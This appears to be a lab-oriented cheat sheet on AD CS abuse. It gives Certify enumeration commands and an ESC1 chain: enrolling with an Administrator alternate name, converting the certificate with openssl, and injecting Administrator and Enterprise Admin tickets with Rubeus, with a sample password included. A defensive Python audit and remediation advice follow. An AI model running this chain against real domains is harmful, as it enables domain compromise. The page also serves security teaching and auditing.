# ad-cs

## Methodology

## Binaries

> [!INFO] Remember to follow the Binaries methodology

## Certify

**Enumerate all Certificate Authorities (CA) in the domain:**

```batchfile
Certify.exe cas
```

**Enumerate templates:**

```batchfile
Certify.exe find
```

**Enumerate vulnerable templates:**

```batchfile
Certify.exe find /vulnerable
```

#### ESC1

**Enroll in the template and copy the private key to a file:**

```batchfile
Certify.exe request /ca:Techcorp-DC.techcorp.local\TECHCORP-DC-CA /template:ForAdminsofPrivilegedAccessWorkstations /altname:Administrator
```

**Convert the PEM (RSA key and certificate) to PFX:**

```batchfile
openssl.exe pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out DA.pfx
```

**Request TGT with the PFX:**

```batchfile
REM Request a TGT and inject it
Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password:password /ptt

REM Request an Enterprise Admin TGT and inject it
Rubeus.exe asktgt /user:techcorp.local\Administrator /dc:techcorp-dc.techcorp.local /certificate:C:\AD\Tools\EA.pfx /password:SecretPass@123 /nowrap /ptt
```
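
The `/altname` request above only works against a template that meets all of the ESC1 conditions. The following is an added example, not part of the original page or of Certify: a defender-side check that flags such templates from exported attributes. The template records, the `enroll_principals` field and the list of broad groups are constructed assumptions.

```python
# Added example: defender-side ESC1 audit over exported certificate template attributes.
# Flag bits and OIDs are the documented AD CS values; the sample records are constructed.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # bit in msPKI-Certificate-Name-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # bit in msPKI-Enrollment-Flag (manager approval)
AUTH_EKUS = {  # EKUs that let a certificate be used for domain authentication
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
# Assumption: groups this audit treats as low-privileged enrollers.
BROAD_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

def esc1_findings(template):
    """Return the reasons if the template meets every ESC1 condition, else []."""
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    enrollers = set(template.get("enroll_principals", []))  # hypothetical field: resolved Enroll ACEs
    name_flag = template.get("msPKI-Certificate-Name-Flag", 0)
    enroll_flag = template.get("msPKI-Enrollment-Flag", 0)
    checks = [
        (name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, "enrollee supplies subject/SAN"),
        (not ekus or ekus & AUTH_EKUS, "usable for authentication"),  # no EKU = any purpose
        (not (enroll_flag & CT_FLAG_PEND_ALL_REQUESTS), "no manager approval"),
        (template.get("msPKI-RA-Signature", 0) == 0, "no authorized signatures required"),
        (enrollers & BROAD_PRINCIPALS, "broad group can enroll"),
    ]
    return [reason for _, reason in checks] if all(ok for ok, _ in checks) else []

def audit(templates):
    """Map template name -> ESC1 reasons, for templates where all conditions hold."""
    results = {t["name"]: esc1_findings(t) for t in templates}
    return {name: reasons for name, reasons in results.items() if reasons}

SAMPLE_TEMPLATES = [  # constructed records, not taken from a real directory
    {"name": "ExampleWorkstationAuth", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll_principals": ["Domain Users"]},
    {"name": "ExampleWebServer", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-RA-Signature": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"], "enroll_principals": ["Domain Admins"]},
    {"name": "ExampleUserApproved", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x2,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"], "enroll_principals": ["Domain Users"]},
]

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_TEMPLATES).items():
        print(f"{name}: ESC1 conditions met ({'; '.join(reasons)})")
```

Clearing the enrollee-supplies-subject flag, requiring manager approval, or narrowing enrollment rights on a flagged template removes the finding.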
